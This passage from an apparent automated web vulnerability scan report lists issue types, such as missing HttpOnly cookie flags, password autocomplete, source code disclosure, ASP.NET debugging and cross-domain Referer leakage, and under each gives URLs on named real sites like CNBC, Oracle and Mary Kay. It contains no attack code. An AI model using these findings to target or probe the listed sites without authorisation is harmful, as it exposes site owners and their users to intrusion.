12.55. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
12.56. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
12.57. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
12.58. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
12.59. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
12.60. http://rt.legolas-media.com/lgrt
12.61. http://search.spotxchange.com/track/tag/6382.1008/img
12.62. http://server.iad.liveperson.net/hc/52793056/
12.63. http://services.krxd.net/geoip
12.64. http://services.krxd.net/pixel.gif
12.65. http://tags.bluekai.com/site/3834
12.66. http://www.actonsoftware.com/acton/bn/1227/visitor.gif
12.67. http://www.bizographics.com/collect/
12.68. http://www.marykay.com/
12.69. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg
12.70. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg
12.71. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg
12.72. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg
12.73. http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js
12.74. http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf
12.75. http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf
12.76. http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf
12.77. http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf
12.78. http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf
12.79. http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf
12.80. http://www.marykay.com/Content/HPflash/502_moc.swf
12.81. http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf
12.82. http://www.marykay.com/IMAGES/bkgLong.gif
12.83. http://www.marykay.com/Images/Checkout/viewbag/btn_x.png
12.84. http://www.marykay.com/Images/Site/FooterBack1.gif
12.85. http://www.marykay.com/Images/Site/hdottedline.gif
12.86. http://www.marykay.com/Images/Site/searchbox.gif
12.87. http://www.marykay.com/Images/Site/vdottedline.gif
12.88. http://www.marykay.com/Images/Site/wholeheader.jpg
12.89. http://www.marykay.com/JS/swfobject.js
12.90. http://www.marykay.com/Menu.css
12.91. http://www.marykay.com/Scripts/HeaderScript.js
12.92. http://www.marykay.com/Scripts/jquery-1.4.2.min.js
12.93. http://www.marykay.com/Styles.css
12.94. http://www.marykay.com/Styles_US.css
12.95. http://www.marykay.com/Themes/TabMenu/US/tabs.css
12.96. http://www.marykay.com/Themes/TabMenu/tabs.js
12.97. http://www.marykay.com/content/HPflash/portfolio_mk.xml
12.98. http://www.marykay.com/content/hpflash/stage.swf
12.99. http://www.marykay.com/default.aspx
12.100. http://www.marykay.com/favicon.ico
12.101. http://www.marykay.com/images/fflogo.jpg
12.102. http://www.marykay.com/images/icn_ec.jpg
12.103. http://www.marykay.com/images/icn_fb.jpg
12.104. http://www.marykay.com/images/icn_pbp.jpg
12.105. http://www.marykay.com/images/icn_vmo.jpg
12.106. http://www.marykay.com/images/icn_yt.jpg
12.107. http://www.marykay.com/images/ielogo.jpg
12.108. http://www.marykay.com/images/searchbutton.gif
12.109. http://www.marykay.com/scripts/i2a.js
13. Cookie without HttpOnly flag set
13.1. http://afe.specificclick.net/
13.2. http://afe.specificclick.net/serve/v=5
13.3. http://blog.harbottle.com/dm/xmlrpc.php
13.4. http://convctr.overture.com/images/cc/cc.gif
13.5. http://data.cnbc.com/quotes
13.6. https://forums.oracle.com/forums/adfAuthentication
13.7. https://forums.oracle.com/forums/category.jspa
13.8. https://forums.oracle.com/forums/guestsettings!default.jspa
13.9. https://forums.oracle.com/forums/index.jspa
13.10. https://forums.oracle.com/forums/login!withRedirect.jspa
13.11. https://forums.oracle.com/forums/main.jspa
13.12. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
13.13. http://pg.links.origin.channelintelligence.com/pages/wl.asp
13.14. http://pg.links.origin.channelintelligence.com/pages/wl.asp
13.15. http://pg.links.origin.channelintelligence.com/pages/wl.asp
13.16. http://pixel.adsafeprotected.com/jspix
13.17. http://pixel.everesttech.net/1688/i
13.18. https://register.cnbc.com/forgotPassword.do
13.19. https://register.cnbc.com/memberCenter.do
13.20. https://register.cnbc.com/registerUser.do
13.21. http://search.oracle.com/search/search
13.22. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
13.23. http://ttwbs.channelintelligence.com/
13.24. http://www.atg.com/svc-common/script/propertyFunc.js.jsp
13.25. http://a.tribalfusion.com/displayAd.js
13.26. http://a.tribalfusion.com/i.cid
13.27. http://a.tribalfusion.com/j.ad
13.28. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html
13.29. http://a.tribalfusion.com/z/i.cid
13.30. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**
13.31. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/**
13.32. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**
13.33. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**
13.34. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**
13.35. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**
13.36. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**
13.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**
13.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**
13.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**
13.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**
13.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**
13.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**
13.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**
13.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**
13.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**
13.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**
13.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**
13.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**
13.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**
13.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534**
13.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844**
13.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154**
13.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464**
13.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772**
13.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080**
13.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388**
13.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696**
13.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005**
13.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313**
13.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623**
13.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934**
13.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243**
13.63. http://ad.yieldmanager.com/pixel
13.64. http://ads.pointroll.com/PortalServe/
13.65. http://ads.rnmd.net/getAds
13.66. http://api.bizographics.com/v1/profile.redirect
13.67. http://api.twitter.com/1/statuses/user_timeline.json
13.68. http://b.scorecardresearch.com/b
13.69. http://c.statcounter.com/t.php
13.70. http://clk.fetchback.com/serve/fb/click
13.71. http://clk.fetchback.com/serve/fb/engmnt
13.72. http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G
13.73. http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL
13.74. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO
13.75. http://d.ads.readwriteweb.com/ck.php
13.76. http://d.ads.readwriteweb.com/spc.php
13.77. http://d1.openx.org/ck.php
13.78. http://developers.facebook.com/plugins/
13.79. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi
13.80. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage
13.81. http://imp.fetchback.com/serve/fb/adtag.js
13.82. http://imp.fetchback.com/serve/fb/imp
13.83. http://lct.salesforce.com/sfga.js
13.84. http://legolas.nexac.com/lgalt
13.85. https://login.cnbc.com/cas/logout
13.86. https://login.oracle.com/favicon.ico
13.87. https://login.oracle.com/mysso/signon.jsp
13.88. https://login.oracle.com/mysso/sso_loginui/b-bg.gif
13.89. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif
13.90. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif
13.91. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif
13.92. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif
13.93. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif
13.94. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif
13.95. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif
13.96. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif
13.97. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif
13.98. https://login.oracle.com/mysso/sso_loginui/loginStyling.css
13.99. https://login.oracle.com/mysso/sso_loginui/moc_lib.js
13.100. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif
13.101. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif
13.102. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif
13.103. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif
13.104. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif
13.105. https://login.oracle.com/mysso/sso_loginui/sso_check.js
13.106. https://login.oracle.com/mysso/sso_loginui/t-bg.gif
13.107. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif
13.108. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif
13.109. https://login.oracle.com/oam/server/sso/auth_cred_submit
13.110. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
13.111. http://m1215.ic-live.com/522/
13.112. http://m1460.ic-live.com/586/
13.113. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
13.114. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1
13.115. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js
13.116. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js
13.117. http://optimized-by.rubiconproject.com/a/dk.html
13.118. http://optimized-by.rubiconproject.com/a/dk.js
13.119. http://oracle.112.2o7.net/b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103
13.120. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140
13.121. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845
13.122. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499
13.123. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388
13.124. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035
13.125. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025
13.126. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303
13.127. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569
13.128. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993
13.129. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862
13.130. http://p.brilig.com/contact/bct
13.131. http://pi.pardot.com/analytics
13.132. http://ping.crowdscience.com/ping.js
13.133. http://pixel.fetchback.com/serve/fb/pdc
13.134. http://pixel.quantserve.com/pixel
13.135. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif
13.136. http://r.openx.net/img
13.137. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
13.138. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
13.139. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
13.140. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
13.141. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
13.142. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
13.143. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
13.144. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
13.145. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
13.146. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
13.147. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
13.148. http://register.cnbc.com/forgotPassword.do
13.149. http://register.cnbc.com/forgotpassword1.jsp
13.150. https://register.cnbc.com/
13.151. https://register.cnbc.com/RandomImage.jsp
13.152. https://register.cnbc.com/cas
13.153. https://register.cnbc.com/checkemail.do
13.154. https://register.cnbc.com/checkpassword.do
13.155. https://register.cnbc.com/checkscreenname.do
13.156. https://register.cnbc.com/checkzipcode.do
13.157. https://register.cnbc.com/createUser.do
13.158. https://register.cnbc.com/css/forgotPassword.css
13.159. https://register.cnbc.com/css/member_center_sytles.css
13.160. https://register.cnbc.com/css/newRegistration.css
13.161. https://register.cnbc.com/css/registration.css
13.162. https://register.cnbc.com/email/EmailSupport.jsp
13.163. https://register.cnbc.com/favicon.ico
13.164. https://register.cnbc.com/forgotPassword1.do
13.165. https://register.cnbc.com/forgotpassword1.jsp
13.166. https://register.cnbc.com/images/clickToContinue.gif
13.167. https://register.cnbc.com/images/loaderImage.gif
13.168. https://register.cnbc.com/images/memberCenterHeader.jpg
13.169. https://register.cnbc.com/images/submitPreferences.jpg
13.170. https://register.cnbc.com/images/tick.jpg
13.171. https://register.cnbc.com/images/tile_02.gif
13.172. https://register.cnbc.com/images/wrong.jpg
13.173. https://register.cnbc.com/js/membercenter.js
13.174. https://register.cnbc.com/js/prototype_ajax.js
13.175. https://register.cnbc.com/js/registrationBasic.js
13.176. https://register.cnbc.com/js/registrationUtils.js
13.177. https://register.cnbc.com/js/registrationValidations.js
13.178. https://register.cnbc.com/js/s_code.js
13.179. https://register.cnbc.com/js/validation.js
13.180. https://register.cnbc.com/quote-html-webservice/fvquote.htm
13.181. https://register.cnbc.com/quote-html-webservice/quote.htm
13.182. https://register.cnbc.com/refreshlogin.jsp
13.183. http://rt.legolas-media.com/lgrt
13.184. http://search.spotxchange.com/track/tag/6382.1008/img
13.185. http://server.iad.liveperson.net/hc/52793056/
13.186. http://services.krxd.net/geoip
13.187. http://services.krxd.net/pixel.gif
13.188. http://sophelle.app5.hubspot.com/salog.js.aspx
13.189. http://statse.webtrendslive.com/dcscnww13100008eg8v7k3x39_3j3x/dcs.gif
13.190. http://t2.trackalyzer.com/trackalyze.asp
13.191. http://t5.trackalyzer.com/trackalyze.asp
13.192. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
13.193. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf
13.194. http://tags.bluekai.com/site/3834
13.195. http://tenzing.fmpub.net/
13.196. http://ticker.cnbc.com/
13.197. http://www.actonsoftware.com/acton/bn/1227/visitor.gif
13.198. http://www.bizographics.com/collect/
13.199. http://www.cnbc.com/
13.200. http://www.cnbc.com/id/15837856
13.201. http://www.cnbc.com/id/15837856/site/14081545/
13.202. http://www.cnbc.com/id/15838394
13.203. http://www.cnbc.com/id/15839263/
13.204. http://www.cnbc.com/pointrollads.htm
13.205. http://www.csc.com/cybersecurity/contact_us
13.206. http://www.csc.com/search
13.207. http://www.csc.com/services
13.208. http://www.csc.com/utils/live_search
13.209. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp
13.210. http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp
13.211. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp
13.212. http://www.gillettevenus.com/en_US/razor_finder/index.jsp
13.213. http://www.gillettevenus.com/en_US/search/index.jsp
13.214. http://www.googleadservices.com/pagead/aclk
13.215. http://www.marykay.com/
13.216. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg
13.217. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg
13.218. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg
13.219. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg
13.220. http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js
13.221. http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf
13.222. http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf
13.223. http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf
13.224. http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf
13.225. http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf
13.226. http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf
13.227. http://www.marykay.com/Content/HPflash/502_moc.swf
13.228. http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf
13.229. http://www.marykay.com/IMAGES/bkgLong.gif
13.230. http://www.marykay.com/Images/Checkout/viewbag/btn_x.png
13.231. http://www.marykay.com/Images/Site/FooterBack1.gif
13.232. http://www.marykay.com/Images/Site/hdottedline.gif
13.233. http://www.marykay.com/Images/Site/searchbox.gif
13.234. http://www.marykay.com/Images/Site/vdottedline.gif
13.235. http://www.marykay.com/Images/Site/wholeheader.jpg
13.236. http://www.marykay.com/JS/swfobject.js
13.237. http://www.marykay.com/Menu.css
13.238. http://www.marykay.com/Scripts/HeaderScript.js
13.239. http://www.marykay.com/Scripts/jquery-1.4.2.min.js
13.240. http://www.marykay.com/Styles.css
13.241. http://www.marykay.com/Styles_US.css
13.242. http://www.marykay.com/Themes/TabMenu/US/tabs.css
13.243. http://www.marykay.com/Themes/TabMenu/tabs.js
13.244. http://www.marykay.com/content/HPflash/portfolio_mk.xml
13.245. http://www.marykay.com/content/hpflash/stage.swf
13.246. http://www.marykay.com/default.aspx
13.247. http://www.marykay.com/favicon.ico
13.248. http://www.marykay.com/images/fflogo.jpg
13.249. http://www.marykay.com/images/icn_ec.jpg
13.250. http://www.marykay.com/images/icn_fb.jpg
13.251. http://www.marykay.com/images/icn_pbp.jpg
13.252. http://www.marykay.com/images/icn_vmo.jpg
13.253. http://www.marykay.com/images/icn_yt.jpg
13.254. http://www.marykay.com/images/ielogo.jpg
13.255. http://www.marykay.com/images/searchbutton.gif
13.256. http://www.marykay.com/scripts/i2a.js
13.257. http://www.sapient.com/en-us/about-sapient/alliances.html
13.258. http://www.sapient.com/en-us/about-sapient/alliances/atg.html
13.259. http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html
13.260. http://www.sapient.com/en-us/search.html
13.261. http://www.tenzing.com/atg-ecommerce-hosting.asp
13.262. http://www2.znode.com/analytics
14. Password field with autocomplete enabled
14.1. https://bugzilla.mozilla.org/show_bug.cgi
14.2. https://bugzilla.mozilla.org/show_bug.cgi
14.3. http://digg.com/submit
14.4. https://login.cnbc.com/cas/login
14.5. https://login.cnbc.com/cas/login
14.6. https://login.cnbc.com/cas/login
14.7. https://login.cnbc.com/cas/login
14.8. https://oracleus.wingateweb.com/portal/newreg.ww
14.9. https://register.cnbc.com/createUser.do
14.10. https://register.cnbc.com/registerUser.do
14.11. https://www.atg.com/service/main.jsp
14.12. http://www.bigcommerce.com/freetrial.php
14.13. https://www.bigcommerce.com/login.php
14.14. https://www.cvs.com/CVSApp/user/login.jsp
14.15. http://www.fetchback.com/
14.16. http://www.oraclecfo.com/Authentication/Login_w.html
14.17. http://www.oraclecfo.com/Main/Home/Home_w.html
14.18. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html
14.19. http://www.shopify.com/login
15. Source code disclosure
15.1. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png
15.2. http://platform.linkedin.com/js/nonSecureAnonymousFramework
15.3. http://reviews.fekkai.com/module/5113/cmn/5113redes/display.pkg.js
15.4. http://reviews.gillettevenus.com/module/4746/cmn/4746/display.pkg.js
15.5. http://search.oracle.com/search/search
15.6. http://www.cvs.com/CVSApp/js/functions.js
15.7. https://www.cvs.com/CVSApp/js/functions.js
15.8. https://www.cvs.com/CVSApp/js/userprofile.js
15.9. http://www.dove.us/Resources/JS/dove.js
15.10. http://www.netsuite.com/portal/javascript/NLPortal.js
16. ASP.NET debugging enabled
16.1. http://services.plymedia.com/Default.aspx
16.2. http://www.oraclecfo.com/Default.aspx
16.3. http://www.znode.com/Default.aspx
17. Referer-dependent response
17.1. http://a.tribalfusion.com/j.ad
17.2. http://api.bizographics.com/v1/profile.json
17.3. http://c.brightcove.com/services/viewer/federated_f9
17.4. https://login.oracle.com/mysso/signon.jsp
17.5. http://use.typekit.com/k/ghj6ovz-d.css
17.6. http://www.facebook.com/plugins/like.php
17.7. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
17.8. http://www.harbottle.com/hnl/pages/articles/direct_beauty_products_trimsole.php
17.9. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html
17.10. http://www.youtube.com/v/JWMKXb1Guq4
18. Cross-domain POST
18.1. http://education.oracle.com/education/netcall/talk_to_us_ca.html
18.2. http://education.oracle.com/education/netcall/talk_to_us_us.html
18.3. http://www.readwriteweb.com/enterprise/2010/11/oracle.php
18.4. http://www.sophelle.com/Contact-Us/
18.5. http://www.sophelle.com/Products/CQ/free-trial.html
19. Cross-domain Referer leakage
19.1. http://a.tribalfusion.com/j.ad
19.2. http://a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js
19.3. https://account.bigcommerce.com/cart.php
19.4. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38
19.5. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2
19.6. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
19.7. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
19.8. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
19.9. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
19.10. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
19.11. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
19.12. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
19.13. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
19.14. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
19.15. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
19.16. http://ad.doubleclick.net/adj/nbcu.cnbc/search
19.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**
19.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**
19.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**
19.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**
19.21. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**
19.22. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**
19.23. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**
19.24. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**
19.25. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**
19.26. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**
19.27. http://ads.adsonar.com/adserving/getAds.jsp
19.28. http://ads.pointroll.com/PortalServe/
19.29. http://afe.specificclick.net/serve/v=5
19.30. http://afe.specificclick.net/serve/v=5
